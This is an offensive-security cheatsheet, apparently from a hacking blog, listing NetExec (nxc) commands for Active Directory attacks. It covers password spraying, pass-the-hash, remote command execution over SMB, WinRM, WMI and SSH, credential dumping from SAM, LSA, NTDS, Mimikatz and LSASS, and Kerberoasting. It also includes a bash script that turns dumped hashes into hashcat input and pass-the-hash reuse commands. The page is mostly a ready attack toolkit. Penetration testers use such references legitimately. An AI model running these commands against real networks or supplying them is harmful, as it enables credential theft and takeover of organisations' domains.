active-directory

NetExec (CrackMapExec) — AD Lateral Movement

NetExec (nxc) — the Swiss Army knife for Windows/AD lateral movement, credential spraying, and post-exploitation.

Apr 2026, lazyhackers
SMB Enumeration & Auth (11)
nxc smb 192.168.1.0/24
Discover SMB hosts on subnet
smb discovery
nxc smb 10.10.10.1 -u user -p password
Test SMB credentials
smb auth
nxc smb 10.10.10.1 -u user -H NTLMhash
SMB pass-the-hash (pass the NT hash; LM:NT is also accepted)
smb pth
nxc smb 192.168.1.0/24 -u user -p password
Spray one credential across the subnet; hosts where the account is local admin are flagged (Pwn3d!)
smb spray
nxc smb 10.10.10.1 -u users.txt -p passwords.txt --continue-on-success
Spray user and password lists; every user is tried against every password unless --no-bruteforce pairs them line by line, so read --pass-pol first and stay under the lockout threshold
smb spray
nxc smb 10.10.10.1 -u user -p password --shares
Enumerate SMB shares
smb shares enum
nxc smb 10.10.10.1 -u user -p password --sessions
List active SMB sessions (which accounts are connected, and from where)
smb sessions
nxc smb 10.10.10.1 -u user -p password --users
Enumerate domain users via SMB
smb users enum
nxc smb 10.10.10.1 -u user -p password --groups
Enumerate domain groups
smb groups enum
nxc smb 10.10.10.1 -u user -p password --pass-pol
Get the domain password policy (lockout threshold, reset window, lockout duration; read this before any spray)
smb policy
nxc smb 10.10.10.1 -u user -p password --rid-brute
RID cycling through LSA lookups to enumerate users and groups (often works with a null or guest session)
smb rid enum
Code Execution (4)
nxc smb 10.10.10.1 -u user -p password -x "whoami"
Execute a command via SMB (local admin required; pick the technique with --exec-method: wmiexec, smbexec, atexec or mmcexec)
smb exec cmd
nxc smb 10.10.10.1 -u user -p password -X "Get-Process"
Execute a PowerShell command (spawns powershell.exe with an encoded command, so expect script-block logging where it is enabled)
smb exec powershell
nxc winrm 10.10.10.1 -u user -p password -x "whoami"
Execute via WinRM / PS Remoting on 5985/5986 (account must be an admin or a member of Remote Management Users)
winrm exec
nxc wmi 10.10.10.1 -u user -p password -x "whoami"
Execute via WMI
wmi exec
Credential Dumping (5)
nxc smb 10.10.10.1 -u user -p password --sam
Dump SAM hashes (local admin needed)
sam dump creds
nxc smb 10.10.10.1 -u user -p password --lsa
Dump LSA secrets, including cached domain logons and service-account secrets (local admin needed)
lsa dump creds
nxc smb 10.10.10.1 -u user -p password --ntds
Dump NTDS.dit via DCSync over DRSUAPI (needs Domain Admin or replication rights); --ntds vss copies the file from a shadow copy instead
ntds dcsync dump
nxc smb 10.10.10.1 -u user -p password -M mimikatz
Run the Mimikatz module (in-memory Invoke-Mimikatz, heavily signatured by AV/EDR; a CrackMapExec-era module, so confirm it is present with nxc smb -L)
mimikatz creds
nxc smb 10.10.10.1 -u user -p password -M lsassy
Dump LSASS remotely with the lsassy module and parse the credentials out of it (local admin needed)
lsassy lsass dump
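The --sam and --ntds entries above print hashes in user:rid:lmhash:nthash::: form, and the next step is always the same: feed them to hashcat and check where the local admin hash is reused. The script below is an added example for this cheatsheet, not nxc's own code and not part of the original page. nxc is never called; the dump lines are constructed samples in the shape nxc prints (the NT hashes of "password", "Password123" and the empty string are real, the krbtgt and DC01$ values are placeholder hex), and the 10.10.10.0/24 target and wordlist.txt name are assumptions.

```bash
#!/usr/bin/env bash
# Added example (not nxc's own code): turn --sam / --ntds output into a
# hashcat input file and a pass-the-hash reuse check, fully offline.
set -e

# Constructed sample of `nxc smb 10.10.10.5 -u admin -p password --sam`.
SAM='SMB  10.10.10.5  445  FS01  [+] Dumping SAM hashes
SMB  10.10.10.5  445  FS01  Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB  10.10.10.5  445  FS01  Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB  10.10.10.5  445  FS01  svc_backup:1001:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB  10.10.10.5  445  FS01  [+] Added 3 SAM hashes to the database'

# Constructed sample of `nxc smb 10.10.10.1 -u da -p password --ntds`
# (mixed plain and DOMAIN\-prefixed names, plus a machine account).
NTDS='SMB  10.10.10.1  445  DC01  [+] Dumping the NTDS, this could take a while
SMB  10.10.10.1  445  DC01  Administrator:500:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
SMB  10.10.10.1  445  DC01  krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6c7ad1eab3ba28b0d1a9bb6c2c3b6e02:::
SMB  10.10.10.1  445  DC01  DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0f3b0a6a3c4cd7e62b1f9d5b1d0d2e71:::
SMB  10.10.10.1  445  DC01  corp.local\jdoe:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'

# "account:nthash" pairs from nxc dump output. Drops the DOMAIN\ prefix (hashcat
# --username format), machine accounts (name ends in $) and the NT hash of the
# empty password, which is never worth cracking or passing.
nt_hashes() {
  printf '%s\n' "$1" | awk -F: '
    NF >= 7 && length($3) == 32 && length($4) == 32 && $4 ~ /^[0-9a-f]+$/ {
      n = split($1, f, " "); acct = f[n]
      i = index(acct, "\\"); if (i) acct = substr(acct, i + 1)   # drop DOMAIN\ prefix
      if (substr(acct, length(acct)) == "$") next                # machine account
      if ($4 == "31d6cfe0d16ae931b73c59d7e0c089c0") next         # empty password
      print acct ":" $4
    }'
}

# Distinct NT hashes only: hashcat need not crack a shared password twice.
unique_hashes() { nt_hashes "$1" | awk -F: '!seen[$2]++ { print $2 }'; }

# Pass-the-hash reuse check, one nxc run per account against the subnet.
# $1 dump text, $2 subnet, $3 extra flags: --local-auth for SAM (local) accounts,
# empty for NTDS (domain) accounts.
pth_commands() {
  nt_hashes "$1" | while IFS=: read -r acct nt; do
    echo "nxc smb $2 -u $acct -H $nt ${3:+$3}"
  done
}

OUT=$(mktemp)
nt_hashes "$SAM" > "$OUT"
echo "hashcat -m 1000 --username $OUT wordlist.txt   # crack the local hashes"
pth_commands "$SAM" 10.10.10.0/24 --local-auth      # where else is the local admin hash valid?
echo "distinct domain NT hashes: $(unique_hashes "$NTDS" | awk 'END { print NR }')"
```

The --local-auth flag matters on the PtH step: SAM entries are local accounts, so without it nxc would try them as domain logons and every host would report a failure even where the hash is valid.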
LDAP & Other Protocols (8)
nxc ldap 10.10.10.1 -u user -p password --asreproast asrep.txt
AS-REP Roasting via LDAP: finds accounts with Kerberos pre-authentication disabled and writes their hashes to asrep.txt (hashcat -m 18200)
ldap asrep kerberos
nxc ldap 10.10.10.1 -u user -p password --kerberoasting kerb.txt
Kerberoasting via LDAP: requests TGS tickets for SPN-bearing accounts and writes the hashes to kerb.txt (hashcat -m 13100 for RC4 tickets)
ldap kerberoast kerberos
nxc ldap 10.10.10.1 -u user -p password --bloodhound -ns 10.10.10.1 -c All
Collect BloodHound data via LDAP (-ns is the older CrackMapExec spelling of the nameserver option; recent nxc releases use --dns-server)
ldap bloodhound
nxc ldap 10.10.10.1 -u user -p password --gmsa
Dump gMSA passwords (only for principals allowed to retrieve the managed password, and the DC returns msDS-ManagedPassword only over an encrypted LDAPS/sealed bind)
ldap gmsa
nxc mssql 10.10.10.1 -u sa -p password --local-auth -q "SELECT @@version"
Run a query as the SQL login sa (--local-auth selects SQL Server authentication; without it the login is attempted as a Windows account)
mssql sql
nxc mssql 10.10.10.1 -u sa -p password --local-auth
Authenticate with a SQL Server login instead of a Windows/domain account
mssql local-auth
nxc ssh 10.10.10.1 -u user -p password -x "id"
SSH command execution
ssh exec
nxc rdp 192.168.1.0/24 -u user -p password
Test RDP credentials across the subnet (successful logons are marked Pwn3d!; the account needs RDP logon rights on the host)
rdp spray